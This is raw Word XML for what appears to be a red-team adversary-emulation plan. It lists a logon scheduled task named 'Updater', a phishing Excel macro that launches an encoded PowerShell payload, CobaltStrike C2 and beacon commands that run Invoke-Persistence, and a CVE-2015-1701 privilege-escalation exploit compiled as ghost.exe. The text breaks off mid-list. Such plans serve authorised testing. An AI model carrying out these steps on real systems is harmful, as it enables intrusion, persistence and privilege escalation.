          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SYSTEM MODIFICATIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId124" w:anchor="system-modifications" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F89A9A2" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>FILES</w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:anchor="files" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F3D6F37" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E04FC6" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>REGISTRY</w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:anchor="registry" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42611AA6" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Schedule Task executed at user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2248233B" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task Name: Updater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447C4881" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:hyperlink r:id="rId127" w:anchor="wmi" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EF64DEF" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A18B831" w14:textId="478F5FD9" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215F1F12" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DEPLOYMENT STEPS</w:t>
      </w:r>
      <w:hyperlink r:id="rId128" w:anchor="deployment-steps" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5937C556" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Phishing Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A5F3D" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify an excel document payload with a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>macros</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that launches a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoded payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C448FAF" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D491552" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> C2 Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3E898" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Build payloads using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21BEE829" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD37AD" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Scheduled Task script with file and path to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48ADA5F7" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Update persistence script with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4BE76" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">line </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>78 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Update encoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB8484" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>line 154: Update Domain name here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A79904" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>PERSISTENCE STEPS (VIA COBALTSTRIKE BEACON CONSOLE)</w:t>
      </w:r>
      <w:hyperlink r:id="rId129" w:anchor="persistence-steps-via-cobaltstrike-beacon-console" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58A5F8DB" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-import /data/PAYLOADS/Invoke-Persistence.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Invoke-Persistence -Name Updater -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CreatePersistence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ScheduledTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248D18E" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>PRIVILEGE ESCALATION (BASED ON CVE-2015-1701)</w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:anchor="privilege-escalation-based-on-cve-2015-1701" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E9C3948" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Compile exploit and name ghost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E735E" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Reference: </w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00643413">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/37049/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EACD2DD" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643413">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32 Bit Binary: ghost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722298C" w14:textId="77777777" w:rsidR="00643413" w:rsidRPr="00643413" w:rsidRDefault="00643413" w:rsidP="00643413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
